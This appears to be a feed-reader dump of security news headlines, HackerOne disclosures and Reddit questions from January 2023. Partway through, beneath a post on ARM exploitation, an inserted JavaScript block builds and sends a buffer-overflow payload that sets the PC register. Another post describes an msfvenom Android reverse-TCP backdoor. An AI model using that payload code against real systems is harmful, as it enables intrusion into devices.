    I understand that there's also Burp Academy, but there's no way an interactive academy can give you knowledge close to what a 900-page book can. I glanced over it and there was a section about Flash, and the labs that are recommended there are no longer available. I know there's still good information in there and will not skip it, but is there something more updated? Thanks submitted by /u/WestAd1987
    RDP Jumpbox - Worth it?
    As I've alluded to previously, I am preparing to put proper firewall policies in between our workstation and infrastructure networks. One aspect I'm not sure on, though, is RDP and SSH access from the workstation network. I've got probably 3 PCs from which admins will want to get RDP/SSH access. Would a jump box be a good solution, and if so, what are some good ways to secure it? My thinking was off the domain and/or MFA to get access. The jump box would only allow RDP from the workstation network, no other services. Keen to get some feedback on this one. Thanks! submitted by /u/brettfk
    Syslog server recommendations?
    We are currently looking for syslog server recommendations. We are looking to eliminate single points of failure. We currently use Splunk and encountered an issue where critical logs were lost because the server ran out of space and overwrote them before we could resolve the issue to ingest them. The primary focus is to eliminate single points of failure if our Splunk instance encounters issues. Log sources: Firewall, Web proxy, Windows events, Sysmon, IDS, EDR, App control, etc. We are currently looking at the following: Rsyslog, Kiwi, syslog-ng. Any other recommendations? Note: there are several similar posts where individuals are recommending SIEMs. We are looking for a syslog server and not a new SIEM solution. submitted by /u/RedNeckHutch
    Is prototype pollution a bug exclusive to server side JS frameworks?
    People talk about prototype pollution as a powerful vulnerability to get RCE, but they never go into detail on the requirements. It seems like it's a problem exclusive to things like Node.js, Express.js, etc., and it's not a thing outside these environments. submitted by /u/TheCrazyAcademic
    If I get a password manager will I have to update every single password manually?
    That seems very much like a big hassle. Is it okay if I just update emails & bank accounts? submitted by /u/SteveSonOfJobs

    Cookie exfiltration through XSS on the main search request of www.lahitapiola.fi
    LocalTapiola disclosed a bug submitted by voiddy: https://hackerone.com/reports/1322322 - Bounty: $500
    PURGE is not authenticated
    Yelp disclosed a bug submitted by rac_fckscty: https://hackerone.com/reports/629612
    1 click Account takeover via deeplink in [com.kayak.android]
    KAYAK disclosed a bug submitted by retr02332: https://hackerone.com/reports/1667998 - Bounty: $3000
    Private information exposed through GraphQL search endpoints aggregates
    HackerOne disclosed a bug submitted by reigertje: https://hackerone.com/reports/1838329

    CVE-2023-22809: Sudoedit can edit arbitrary files
    Article URL: https://seclists.org/oss-sec/2023/q1/42 Comments URL: https://news.ycombinator.com/item?id=34445602 Points: 55 # Comments: 29

    Hacking with cURL: Unleash the CLI beast
    Curl, or client URL is a command line tool that enables data exchange between a device and a server through a terminal. We can use this… Continue reading on Medium »
    Starting my path to bug hunter
    my personal bug bounty to-do items Continue reading on Medium »
    SQL INJECTIONS
    Hii amigos today we are going to discuss about complete overview of SQLinjection and how to find them to earn some good bounties Continue reading on Medium »
    How I was able to hack into anyone’s account on an Institute Portal…
    As I was just messing up with my cousin’s Institute Portal, I noticed its login area and got curious to test its functionalities. Continue reading on Medium »
    Fuzz open source for potential bounties
    Most companies use open source projects. Identifying these components and fuzzing them with free fuzzers can show you vulnerabilities to… Continue reading on Medium »
    The easiest way I used to bypass an admin panel
    In this story I’m explaining a vulnerability that I reported to a program in Hackerone, my english is not perfect and its not my mother… Continue reading on Medium »
    Bug Bounty for Beginners (Part 1): Utilizing OWASP to get into BBPs
    This article will cover the essentials to get started with bug bounty hunting. There are many organizations with a need to have their… Continue reading on Martian Defense Cybersecurity »
    API Misconfiguration - No Swag of SwaggerUI
    Summary Continue reading on Medium »
    Easy XSSHunter Discord Alerts
    This will be a setup guide for XSSHunter and integrating it with Discord Continue reading on Medium »
    A Comprehensive Guide to Writing Effective and Informative Bug Vulnerability Reports
    Bug vulnerability reports are critical for identifying and addressing security issues in software systems. Continue reading on Medium »
    Cross-site WebSocket hijacking
    Portswigger Lab Solution — Cross-site WebSocket hijacking | Karthikeyan Nagaraj Continue reading on InfoSec Write-ups »

    Chapter 1: The Social Station
    The lifes of many people around the globe rely on social stations and on our health care system every day. Continue reading on Medium »
    Wizard Spider
    Wizard Spider is a hacking group known for cyber espionage and targeting governments. They have been active since 2017 and are based in Russia. Continue reading on Medium »
    Simulating Attacks, Defending Systems, and Enhancing Security: The Role of Red, Blue, and Purple…
    How Organizations Can Stay Ahead of Threats Continue reading on Medium »

    Aerleon, a vendor-agnostic firewall management system
    submitted by /u/ankenyr
    New Remcos RAT version uses direct syscalls to evade detection.
    submitted by /u/woja111
    Simple, open-source, lightweight stress testing tool
    submitted by /u/chrisy_e
    POC Exploit for CVE-2022-47966 affecting multiple ManageEngine products
    submitted by /u/scopedsecurity
    SeeProxy: Golang reverse proxy with CobaltStrike malleable profile validation.
    submitted by /u/bambo_gambo
    Exploiting CVE-2021-3490 for Container Escapes
    submitted by /u/Gallus
    Centreon Map plugin allows pre-auth remote process memory dump (CVSS 8.3) - PoC
    submitted by /u/qwerty0x41

    SecWiki News 2023-01-19 Review
    Advice on writing top-conference papers (part 1): macro-level structure, avoiding "hard to follow" by ourren; Managing vast numbers of vulnerabilities, seen through the CISA KEV by ourren; Practical automated vulnerability discovery based on code property graphs by ourren; A brief analysis of the MQTT attack surface and discovery approaches by 路人甲; Exploring an exploitation approach for a Foxit Reader vulnerability by 路人甲. For more recent articles, visit SecWiki.

    FreeBuf Morning Report | Ukraine calls for a "cyber United Nations"; China's first compliant cross-border data transfer case lands in Beijing
    According to the Beijing Cyberspace Administration, a joint research project between Beijing Friendship Hospital (affiliated with Capital Medical University) and Amsterdam UMC in the Netherlands has become the country's first compliant cross-border data transfer case.
    The salespeople I have known in the cybersecurity industry
    As someone on the product and R&D side, I have travelled all over the country and fought side by side with many sales brothers and sisters.
    Top 10 global cybersecurity vulnerabilities of 2022 | FreeBuf year in review
    This article reviews the top 10 high-risk vulnerabilities of 2022 (in no particular order) across several dimensions: disclosure date, severity, and scope of impact.
    A bumper year? GDPR fines surged to $3.1 billion last year
    The figure covers all known GDPR fines issued since 28 January 2022 by the 27 EU member states plus Iceland, Liechtenstein, Norway and the United Kingdom.
    Unhappy with South Korea's cooperation with NATO, pro-Russian hackers claim to have breached Samsung's internal servers
    The pro-Russian hacker group Genesis Day claims it breached Samsung Group's internal servers out of displeasure with South Korea's cooperation with NATO.

    Hack File Inclusion in DVWA: A Full Walkthrough — StackZero
    Cross-site WebSocket hijacking
    MySQL LOAD_FILE() and INTO OUTFILE() Sql Injection

    A template for modern shellcode coding + A socks proxy shellcode for pivoting on IOT
    https://github.com/nobodyisnobody/docs/tree/main/modern.templates.for.shellcoding A convenient template for developing your shellcode on various architectures (x86, ARM, MIPS). It permits you to run and debug your shellcode, produce an executable, or dump it to include in your C or Python exploit. As an example of usage, here is a Socks4 proxy shellcode (x86, ARM, MIPS, etc.), to pivot on IoT for example and gain access to an internal network. https://github.com/nobodyisnobody/docs/tree/main/a.socks.proxy.shellcode Any suggestions are welcome. submitted by /u/nobodyisnobody13


    5 basic techniques for automating investigations using the Wayback Machine (archive.org)
    Archive.org is one of the most important sources of information for #osint. From 1996 to 2023, more than 778 billion web pages were saved… Continue reading on Medium »
    A list of 20 OSINT tools
    Part 1 Continue reading on Medium »
    How to find more information about a group of dancing dinosaurs spotted on Twitter (a…
    Sometimes you will encounter a photo or video that will need further inspection. You watch the footage endlessly and question yourself how… Continue reading on The First Digit »
    How to find more information about a group of dancing dinosaurs spotted on Twitter (a…
    Sometimes you will encounter a photo or video that will need further inspection. You watch the footage endlessly and question yourself how… Continue reading on Medium »
    Unlock the Power of Telegram Bots for OSINT
    Unlock the power of OSINT with these awesome bots! From data mining to social media monitoring, these bots can help you get the intel you… Continue reading on Medium »

    Sudoedit can edit arbitrary files (CVE-2023-22809)
    Article URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22809 Comments URL: https://news.ycombinator.com/item?id=34434047 Points: 2 # Comments: 0
    Git 2.39.1 (and more) released (CVE-2022-41903, CVE-2022-23521)
    Article URL: https://lwn.net/Articles/920256/ Comments URL: https://news.ycombinator.com/item?id=34423630 Points: 7 # Comments: 0

    Brand New
    Hello everybody! I currently have Sec+ and am looking at furthering my education in the field of computer forensics! I'm brand new to this area of computing/security and would like to find out some pointers or the best pathway to get started. Any help would be great, thank you everyone. submitted by /u/Zealousideal_Cry7794

    Hack File Inclusion in DVWA: A Full Walkthrough — StackZero
    Discover how to exploit file inclusion vulnerabilities using DVWA in this tutorial. Learn everything about these vulnerabilities. Continue reading on InfoSec Write-ups »
    How I identified and reported vulnerabilities in Oracle and the rewards of responsible…
    Hello folks, I hope you are doing well. I'm Parag Bagul, a security researcher and bug bounty hunter. Continue reading on Medium »
    Bug Bounty: Writing a Good Bug Report
    When writing a bug report, it is crucial to keep in mind the audience who will be reading it. Program Owner Analysts may not have the same… Continue reading on Medium »
    How to scan a host with RustScan
    When performing a penetration test, one of the most crucial parts is scanning and enumeration. Because if you lose any important port at… Continue reading on Medium »
    PARTICIPATE IN TERNOA BUG CAMPAIGN
    A bug bounty program, also known as a vulnerability rewards program (VRP), is a crowdsourcing project that rewards people for finding and… Continue reading on Medium »
    How to Make Ransomware with Python
    Disclaimer: This tutorial is just for educational purposes, don’t try to break any computer except yours. If you try to make real… Continue reading on Medium »
    How to start bug bounty for beginners ($100+ /Day)
    Here are some steps for beginners to get started with a bug bounty program: Continue reading on Medium »
    Bug Hunting 101: Multi-Factor Authentication OTP Bypass
    TL;DR- A step-by-step walkthrough on how to bypass one-time passwords, including various methods of exploitation and links to further… Continue reading on The Gray Area »

    A trio of dubious denial-of-service security vulnerability reports
    Article URL: https://devblogs.microsoft.com/oldnewthing/20230117-00/?p=107722 Comments URL: https://news.ycombinator.com/item?id=34433617 Points: 1 # Comments: 0

    Curling
    This is part of the HTB track under the name of Intro to Dante Continue reading on Medium »
    Unlock Your Cybersecurity Potential: Navigating the Career Paths
    Are you fascinated by the world of cybersecurity and wondering which career path is right for you? Continue reading on Medium »
    Unlock Your Cybersecurity Potential: Navigating the Career Paths
    Are you fascinated by the world of cybersecurity and wondering which career path is right for you? Continue reading on System Weakness »
    ChatGPT for Offensive and Defensive Cyber
    From research to writing SIEM rules, offensive scripts to report writing, learn how ChatGPT can be used for cybersecurity. Continue reading on Medium »
    Applications’ DoS based on Data Stress using Python
    The stress attack is similar to the database stress test in that both involve subjecting the application to large volumes of information… Continue reading on System Weakness »
    Applications’ DoS based on Data Stress using Python
    The stress attack is similar to the database stress test in that both involve subjecting the application to large volumes of information… Continue reading on Medium »
    Atomic Red Team Theory
    Atomic Red Team is an open-source project that provides a framework for testing the effectiveness of security controls in an organization… Continue reading on Medium »

    Downloading stuff.
    Now to start with - I am not going to touch wget here. There is already a wealth of info about it here. Check the sidebar and go from there. I’ll go thru my process to download var. files (not just OD’s) as some may find it helpful. Maybe even have tips & tricks to streamline muh flow! FINDING DOWNLOADS Not a how-to-search per-se, more just a pointer. On chromium (using less and less due to resource hogging) you can basically add your own search operand by following the process here - https://support.google.com/chrome/answer/95426 here as an eg. is 1 of mine (note this is for searching for porn & NSFW but the system is the same for most sites) Fuskator fusk https://fuskator.com/search/%s/quality/ Firefox doesn’t make it so easy unfortunately - you can add & remove the approv…
    Tons of old iOS apps (iOS 2 to 8)
    submitted by /u/themariocrafter
    Halloween costume images
    submitted by /u/themariocrafter

    Sudoedit can edit arbitrary files (CVE-2023-22809)
    submitted by /u/0xdea
    Gold Digger: a simple tool to quickly discover credentials/sensitive information in files recursively
    submitted by /u/ustayready
    Java XML security issues and how to address them
    submitted by /u/got_nations
    Nothing new under the Sun - Discovering and exploiting a CDE bug chain
    submitted by /u/0xdea
    Tailscale bug allowed a person to share nodes from other tailnets without auth
    submitted by /u/Security_Chief_Odo

    How easy is migrating from LastPass?
    Let's say I am going to migrate from LastPass to another password manager. Other than writing down (or copy-pasting to a text editor) all my passwords, then entering the sites one by one under the new password manager, is there another, easier way to do it? Like a common export/import format between LastPass and another password manager? submitted by /u/mscheckfar
    Likely scenario or more like fiction?
    Hello, I was wondering if you could evaluate a scenario for me. Background: Fully updated iPhone with no jailbreak or any other modifications. It has not yet been set up, so when you turn it on the welcome message appears and asks you to create an iCloud account and a username etc. There is no passcode or anything because the phone is not even set up yet. The only thing that has happened since it was opened from the box is that the SIM card has been inserted into it. Left unattended for 5-10 minutes. Hypothetical scenario: a bad actor comes in during those 5-10 minutes, takes the phone somewhere, inserts it into some machine, and the machine uploads some kind of virus or malware or keylogger into it that controls the device. Allows the user to remote into it or see what's going on, like an MDM device or something, idk. Ambient listening and stuff. Questions: is this scenario likely? Why or why not? I know certain software exists that brute-forces passcodes, which the FBI or whatever has, and maybe even downloads data. I guess from there, with access to an unlocked device, they could install some type of spyware or something. But a. that would be a very sophisticated actor, and b. that iPhone has been set up and has data on it; in my scenario it is an iPhone that is still in welcome mode, so can someone install a virus / malware / whatever into that? So overall, is this scenario possible or likely? And if so, would a simple factory reset clear things up? Thank you!!! submitted by /u/Normal-Question-1994
    WhatsApp vs Telegram chat and security
    Hi, from the network security perspective, is there any real difference between WhatsApp chats and Telegram encrypted chats? Both claim to be end-to-end encrypted. I am not speaking about topics like "WhatsApp is a Meta product while TG is not". Thank you! submitted by /u/g-simon
    Observing the data a process writes to a file?
    I have an application that logs data to a file and immediately deletes it. I've been using all your standard Windows tools (procmon / Process Explorer) to try and see exactly what data is being written, but having no luck. Can anyone recommend a way to actually see what data is being written to a file by a Windows application? submitted by /u/security_intern

    Major Conference Roundup: Perspectives from Defcon, RSA, Black Hat, Gartner, and more!
    The 2022 conference schedule ramped up in the second half of the year, and as you might expect, TrustedSec both attended and spoke at many of them. Within our organization, we have many different perspectives and focused interests, so we sampled opinions from some of the people who attended. We were curious how our experiences... The post Major Conference Roundup: Perspectives from Defcon, RSA, Black Hat, Gartner, and more! appeared first on TrustedSec.

    How I passed the AWS security specialty certification in 2023
    Another year and another cert ! Continue reading on InfoSec Write-ups »
    JWT authentication bypass via unverified signature — Portswigger Simple Solution Writeup | 2023
    Software Development Lifecycle (SDLC), DevSecOps, SAST, DAST And IAST Concepts
    How to Find Compromised Credentials on Darkweb?
    How many of you often see messages and alerts saying “Your credentials are compromised and found on darkweb”. In this article, let’s… Continue reading on InfoSec Write-ups »
    Explore Darkweb With These Surface Web Resources: A Large Collection of Darkweb Onion Links
    This article presents you with a list of surface web sites that contain a vast number of onion URLs that you can use to explore and deep… Continue reading on InfoSec Write-ups »
    Full Team Takeover
    Internet Down!? Here’s how to solve it…
    How I found 40+ Directory Listing Vulnerabilities of Source Code Disclosure via Exposed WordPress…
    How I found Source Code Disclosure via Exposed .git Folder using Google Dorks

    Looking for FREE resources to learn
    Hey everyone! I'm happy to have joined the community! I'm very new at this, but not an absolute starter. I'm building a Discord server to share the learning resources I gather along the way. https://discord.gg/Qe3Tfnp2 I'd love it if you'd help me test it, as it is in beta still. And maybe you can share some FREE resources in the comments? (The reason why I'm asking for them to be free is because I'm writing from LatAm and I want to teach underprivileged kids/people about red and blue teaming.) Thank you so much for being kind and patient with noobs like us. My pronouns are She/Her. TYSM submitted by /u/ZestycloseRaccoon466

    Fuzzing with Radamsa in BlackArch
    Radamsa is a test case generator, it receives some input data and then it scrambles it to return some random data. Random is truly random… Continue reading on Medium »

    SecWiki News 2023-01-18 Review
    Security analysis of open-source software by ourren; Threat analysis using cyberspace mapping by ourren; 2022 global advanced persistent threat (APT) research report by ourren. For more recent articles, visit SecWiki.

    Chinese Playful Taurus Activity in Iran
    Chinese APT Playful Taurus is using a new backdoor named Turian. Analysis suggests several Iranian government networks have likely been compromised. The post Chinese Playful Taurus Activity in Iran appeared first on Unit 42.

    FreeBuf Morning Report | BlackCat and other ransomware threaten the healthcare sector; GDPR fines exceeded $3 billion last year
    The European Data Protection Board issued roughly €2.9 billion (about $3.1 billion) in fines in 2022, more than double the amount issued in 2021.
    Overview of investment and financing in China's cybersecurity industry in 2022 | FreeBuf year in review
    A chronological review of the specific investment and financing events in China's domestic cybersecurity industry in 2022.
    Mind-blowing: Google ads are actually spreading malware
    Just because he clicked an ad in Google search results, Alex's accounts were plundered a few hours later.
    Nissan North America data breach caused by a third-party vendor's exposure
    The leaked customer data includes full names, dates of birth and NMAC account numbers (Nissan financing accounts).
    Attackers could abuse GitHub Codespaces to deliver malware
    The good news is that the attack technique devised by the researchers has not yet been seen in in-the-wild attacks.

    [Vulnerability Notice] WebLogic remote code execution vulnerability (CVE-2023-21839)
    WebLogic has a remote code execution vulnerability that allows an unauthenticated attacker with network access over the IIOP protocol to compromise a vulnerable WebLogic Server; successful exploitation can lead to WebLogic Server...
    [Security Notice] Oracle's January update fixes multiple high-severity vulnerabilities
    Oracle recently released its security update for January 2023, covering 327 vulnerabilities across its products (WebLogic Server, Database Server, Java SE, MySQL and others). Among the vulnerabilities fixed this time...

    I use Metasploit for ethical hacking. I have a backdoor android/reverse_tcp that I built using msfvenom and passed to it my external IP and port 4444. How do I use msfconsole to listen for the TCP connection coming to my machine? Note that I set up port forwarding with the machine IP and enabled por
    submitted by /u/Odaymard
    Ransomware Diaries: Volume 1
    submitted by /u/dmchell

    Should I save my main email info in a password manager?
    I'm not sure what I should include and exclude from a password manager. Putting in your main email makes me feel a bit uneasy even if it's encrypted. submitted by /u/BeneficialAddendum24
    Need recommendation for a password manager
    I keep getting answers between 1Password and Bitwarden. Asking Google is useless since every review site puts either one of them at the top and then another site puts them in 5th place, etc. Also, should I make a new email account for this manager alone, or is it pointless? One of my email accounts has been exposed in earlier breaches, so I get like 5-20 login attempts by bots every day, all unsuccessful of course, but it's annoying anyway. Edit: Went with 1Password. Thanks for all the suggestions :) submitted by /u/BeneficialAddendum24
    To spice up security in a password manager, should you only include parts of the password rather than the full password?
    Example: you put in a 30-character letter/symbol/number password, but then you add another 4 letters/numbers that are excluded from the password saved in the manager, like a PIN code, and those last 4 characters are different for every password and you have either memorized them or written them down on paper. That way, if SOMEHOW your vault were to be compromised, the hacker doesn't have the full password anyway. Is this a good or dumb idea? I know the chances of this happening are extremely low, but you can't be too careful? submitted by /u/BeneficialAddendum24
    Microsoft LAPS vs custom script via NinjaRMM
    Microsoft LAPS is difficult to implement for roaming users, which most are these days. Having an RMM agent on them introduces an alternative like the one outlined in this article. At the end of the article they say it isn't the best in terms of password storage, which I agree with. However, the same can kind of be said for LAPS storing plain text in Active Directory, unless I'm missing something. Just wondering if it's six of one, half a dozen of the other, or if one has a clear advantage over the other that I am missing. Purpose Built Local Account Password Rotation for NinjaRMM | MSP Automator submitted by /u/junkaccount1999
    What were your criteria for choosing a SIEM and why?
    Hi there. I worked closely only with Splunk SIEM, as an engineer, as a SOC analyst and as a threat hunter, and I loved this software. My personal criteria in choosing SIEM products may be strange, but I'm mainly interested in whether I can build complex searches and dashboards for my security investigations. I'm also learning ELK now, which is more difficult for me after Splunk, but I think the potential is the same, although I find it difficult that there are 3 different languages for data search. Splunk used a syntax similar to bash scripts in Linux, and ELK has its JSON queries, which is not very convenient for me yet, because I have to write more code, but I like this product. I've had experience with McAfee SIEM and AlienVault, and those products had a lot of tools already buil…
    Experience with Microsoft Compliance Manager?
    Microsoft offers a compliance solution for enterprise organizations at compliance.microsoft.com From the portal, it looks like this tool can track your adherence to common regulations and standards like ISO 27001, showing you which requirements are already covered by Microsoft and allowing you to register what you covered yourself. You can also classify certain types of data and track where they are used/stored. It seems there's also an option to see which apps are in use, but we already have that overview in MS Intune. They offer a free 90 day trial, but I'm hesitant to start it since I don't have an idea of how much time I should invest to get the most out of such a trial. Also, I don't want to start a trial with a tool just because it's from a supplier that we're already using without looking at the alternatives first. I'd love to hear if anyone is already using this tool, what benefits it brings you, and how it compares to similar tools. Also, I'm really interested in the time it took to set up the tool properly, and the time it takes to follow-up on the reports that are generated. submitted by /u/Extra-Guitar-9515 [link] [comments]
    Encryption !!
    How can one identify whether data flows within the organization (in transit) and data storage (at rest) are protected by appropriate cryptographic algorithms? submitted by /u/NoLion5101 [link] [comments]
    what was the name of the tool that does risk analysis on imported libraries?
    Hi all, a few weeks ago I saw a tool on the netsec subreddit. The tool was analyzing the imported libraries in a project. It was checking how popular the library is, whether the e-mail address of the maintainer can be hijacked, whether the library has some malicious code in it, etc. It was a kind of risk analysis tool for imported libraries. I forgot the name of this tool and couldn't find it by searching. If someone can help me find it, that would be great. submitted by /u/utku1337 [link] [comments]
  • Open

    What did I find?
    CEH v12 Continue reading on Medium »
    Hacktoria — The Sleeper Cell
    Ok, this was quick and simple. I solved it in four steps: Continue reading on Medium »
    The Open-Source Technique That Led Me To Access Thousands Of Students' Academic Records - Syed Rizwan
    Hi, I’m Syed Rizwan and this is my first vulnerability submission in 2023. Continue reading on Medium »
    Means about “Googlosint”…
    For a long time, OSINT in the West has been associated with Google — searching for information through Google. This led me to want to… Continue reading on Medium »
  • Open

    OpenAdmin (HTB)
    This is part of the HTB track under the name of Intro to Dante Continue reading on Medium »
    Heist (HTB)
    This is part of the HTB track under the name of Intro to Dante Continue reading on Medium »
  • Open

    HTML INJECTION on https://adobedocs.github.io/JourneyAPI/ due to outdated SWAGGER UI
    Adobe disclosed a bug submitted by dreamer_eh: https://hackerone.com/reports/1744212
    DOM XSS at `https://adobedocs.github.io/indesign-api-docs/?configUrl={site}` due to outdated Swagger UI
    Adobe disclosed a bug submitted by dreamer_eh: https://hackerone.com/reports/1736327
  • Open

    AWS CloudTrail vulnerability: Undocumented API allows CloudTrail bypass
    Article URL: https://securitylabs.datadoghq.com/articles/iamadmin-cloudtrail-bypass/ Comments URL: https://news.ycombinator.com/item?id=34420752 Points: 12 # Comments: 0
  • Open

    Intel or AMD for Forensic Workstations?
    Core 9 or Threadripper go…… submitted by /u/Thalek [link] [comments]
    A New Program Execution Artifact - Windows 11 22H2 Update!
    Good morning, The first new publicly released episode of 2023 is now available. Check out this important video covering a new evidence of execution artifact introduced in Windows 11 22H2. ----- In this episode, we'll take a look at a new Windows 11 Pro 22H2 program execution artifact discovered in late December 2022. We'll cover the basics and then look at the artifact in action on a Windows 11 system. Episode: https://www.youtube.com/watch?v=rV8aErDj06A Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed 13Cubed Patreon (Help support the channel and get early access to content and other perks!): https://www.patreon.com/13cubed submitted by /u/13Cubed [link] [comments]
    Hacktivists Leak 1.7TB of Cellebrite, 103GB of MSAB Data
    submitted by /u/Complex-Awareness-77 [link] [comments]
  • Open

    From Error_Log File(P4) To Company Account Takeover(P1) and Unauthorized Actions On API
    Hi everyone, my name is Muhanad Israiwi. I’m a bug bounty hunter and a software engineering student at Amman Arab University. Continue reading on Medium »
  • Open

    Hacking ICS Historians: The Pivot Point From IT to OT
    submitted by /u/derp6996 [link] [comments]
    Security audit of Git
    submitted by /u/joernchen [link] [comments]
    AWS CloudTrail vulnerability: Undocumented API allows CloudTrail bypass | Datadog Security Labs
    submitted by /u/RedTermSession [link] [comments]
    Creating a polymorphic malware using ChatGPT
    submitted by /u/ES_CY [link] [comments]
    Introducing RPC Investigator
    submitted by /u/Gallus [link] [comments]
    The misadventures of SPF: Delivering SPF authenticated emails on behalf of the Ukrainian MoD, MIT and 1000+ others.
    submitted by /u/Jumpy_Resolution3089 [link] [comments]
  • Open

    A brief account of auditing the ThinkPHP 3 framework
    MVC frameworks are essential knowledge for code auditing; here, using ThinkPHP 3.2.3 as the example, we walk through a vulnerability audit of MVC framework code.
    FreeBuf Morning Report | Avast releases a free ransomware decryptor; T95 TV boxes sold on Amazon hide malware
    Security firm Avast has released a free decryptor for BianLian ransomware, allowing victims of the malware to recover their locked files.
    Top 20 cybersecurity trend predictions for 2023 | FreeBuf year-end review
    Cybersecurity will remain a top priority in 2023; this article collects forecasts from several authoritative institutions and the security industry, covering the questions security professionals care about.
    Android TV boxes sold on Amazon are quietly stealing your data
    Researchers found that T95 Android TV boxes sold on Amazon and AliExpress come preinstalled with sophisticated malware.
    Key points of cryptographic application security assessment: common issues in one-time password technology
    This article summarizes common one-time-password authentication technologies, outlines the main functions and security requirements of OTP tokens and OTP authentication systems, and offers some recommendations.
    70% of applications contain at least one vulnerability five years after release
    Five years after release, at least 70% of applications contain a security vulnerability.
    New report: are Java and .NET the least secure?
    More than three quarters of applications written in Java and .NET have at least one OWASP Top 10 vulnerability.
  • Open

    Help with arm exploitation
    Hello, I’m trying to exploit a web server running on an ARM machine. I have a problem sending the payload to overflow the PC. I can’t send the payload with a Python script, so I have to either edit the JavaScript function sending the GET request or edit the packet with Fiddler. When I overflow the PC (after a x 65 filling the stack) by editing the JavaScript source, it adds 0x2c after each value. For example: I enter 0xa4a4a4a4, so the stack is going to be 0xa4 0x2C 0xa4 0x2C 0xa4 0x2C 0xa4 0x2c. When editing the packet with Fiddler, it sends gibberish for some reason. I saw that in Python you use the ‘b’ prefix like b’0xa4a4a4a4’, but I can’t use Python. Does anyone know how to do this in JavaScript? Thank you very much. submitted by /u/yoni58360 [link] [comments]
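    An added example, not from the post above, of carrying an exact byte sequence in a GET parameter from JavaScript. Two pitfalls produce the symptoms described: turning an array of values into a string (`[0xa4, 0xa4].toString()`) joins the elements with ASCII commas, which is where a 0x2c after every value comes from; and a character such as `String.fromCharCode(0xa4)` placed in a URL is UTF-8 encoded by the browser (0xC2 0xA4), so the server never sees the single byte. Packing the payload into a byte array and percent-encoding every byte avoids both. The filler length, the parameter name and the target URL below are placeholders, not values from the post.

```javascript
// Added example: packing an exact byte sequence into a GET parameter from JavaScript.
// Runs in Node 18+ and in the browser; only Uint8Array, DataView and fetch are used.

// Build `fillerLen` bytes of 'a' (0x61) followed by the 32-bit value that should land in PC,
// written little-endian, which is the byte order of ARM in its default configuration.
function buildPayload(fillerLen, pcValue) {
  const buf = new Uint8Array(fillerLen + 4);
  buf.fill(0x61, 0, fillerLen);
  new DataView(buf.buffer).setUint32(fillerLen, pcValue >>> 0, true); // true = little-endian
  return buf;
}

// Percent-encode every byte as %XX. Unlike encodeURIComponent, this never UTF-8-encodes
// bytes >= 0x80 and never leaves bytes such as 0x2c (',') or 0x00 for the browser to mangle.
function percentEncode(bytes) {
  return Array.from(bytes, b => '%' + b.toString(16).padStart(2, '0').toUpperCase()).join('');
}

// Inverse of percentEncode: what a standard URL decoder on the server reproduces.
function percentDecode(str) {
  const out = [];
  for (const m of str.matchAll(/%([0-9A-Fa-f]{2})/g)) out.push(parseInt(m[1], 16));
  return new Uint8Array(out);
}

// Assemble the request URL. `base` and `param` stand in for the real endpoint and parameter.
function buildUrl(base, param, bytes) {
  return `${base}?${param}=${percentEncode(bytes)}`;
}

// Send it. In the browser this replaces the page's own XMLHttpRequest call; it needs a
// reachable target, so it is not exercised by the checks below.
async function send(base, param, bytes) {
  const res = await fetch(buildUrl(base, param, bytes), { method: 'GET' });
  return res.status;
}

// Example usage (placeholder URL): 65 filler bytes, then 0xa4a4a4a4 into PC.
// send('http://target.local/cgi', 'name', buildPayload(65, 0xa4a4a4a4));
```

    Check the bytes in the browser's network tab or in Fiddler: the query string must read `%61%61...%A4%A4%A4%A4`, with no `%C2` before an `%A4` and no `%2C` between values. If the server decodes the parameter with something other than a standard URL decoder, or truncates at 0x00, that is a property of the target to test separately.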
    How do you decide what to exploit?
    I am trying to understand how you all narrow down what to exploit. Like, does someone (say your employer) tell you to exploit something, do you randomly pick up something, do you look at CVEs and try exploiting them, do you discover the vulnerability and then try to exploit it, etc.? Thanks for sharing your thoughts. submitted by /u/flylikegaruda [link] [comments]
  • Open

    SecWiki News 2023-01-17 Review
    Having fun with CodeQLpy: vulnerability hunting in Yonyou GRP-U8 by ourren; Some thoughts on intelligent software development in the era of large models by ourren; Secure development: an analysis of the Pcshare workflow by ourren; A summary of Code Review methodology and practice by ourren; Applying transfer learning to cybersecurity: predicting vulnerability exploitability from vulnerability descriptions by ourren. For more of the latest articles, visit SecWiki
  • Open

    Sermons
    http://delongdirect.com/sermons/ https://www.reliancechurch.org/app_folder/Sermons/ https://hopewellbc.com/wp-content/uploads/sermons/ submitted by /u/Waste-Release-6235 [link] [comments]
  • Open

    2023 Resolutions for Script Kiddies
    Introduction 2022 was a tough year. It seemed like no one was safe. Nvidia, Samsung, Ubisoft, T-Mobile, Microsoft, Okta, Uber—and those were just some of Lapsus$’s breaches. What’s a Script Kiddie to do to be better protected in 2023? Another year in the books, and it was another big year for cybersecurity. While 2022 did... The post 2023 Resolutions for Script Kiddies appeared first on TrustedSec.
  • Open

    eLFI already solved it, better get going #BUGCROWD Challenge Walkthrough
    No content preview
  • Open

    [Vulnerability Advisory] Harbor registry unauthorized access vulnerability
    Harbor registries have an access-control flaw caused by misconfiguration: an attacker can search for image names through the web page, bypassing the login check, and directly view unauthorized private image repositories in the results and obtain repository information (Pull...

  • Open

    rsbkb: a Rust CLI tool to easily chain operations (CyberChef-like) through pipes. Other utils as a bonus.
    submitted by /u/alain_proviste [link] [comments]
    Unauthenticated Configuration Export in Multiple WAGO Products
    submitted by /u/g_e_r_h_a_r_d [link] [comments]
    [CVE-2023-0179] Linux kernel stack buffer overflow in nftables: PoC and writeup
    submitted by /u/qwerty0x41 [link] [comments]
  • Open

    Cortex XDR - query on behaviour based detection
    Any Cortex XDR users in house? I was wondering how I can check whether Cortex XDR would have behaviour-based protection against a specific vulnerability exploit on managed endpoints. submitted by /u/Odd-Feed-9797 [link] [comments]
  • Open

    SANS FOR85 - live vs in person
    ** title typo: this is for FOR585*** For those who took FOR585 from SANS in the live Web format, did you feel that you missed out on anything by taking it live instead of in person? Also, any general comments on the course? submitted by /u/Redditor2597 [link] [comments]
    mysql db forensics
    Could you give me instructions or good resources to learn MySQL DB forensics? Including what we can analyse when MySQL logs are not enabled (except the error log)? My main focus currently is MySQL running on Ubuntu. submitted by /u/dum2dum [link] [comments]
  • Open

    Protecting Your Telegram Accounts: Best Security Practices
    Uncovering the Top Tactics to Keep Your Anonymity Intact and Stay Safe Continue reading on Medium »
    OhSINT ON TRYHACKME
    What is OSINT in cyber security? Continue reading on Medium »
  • Open

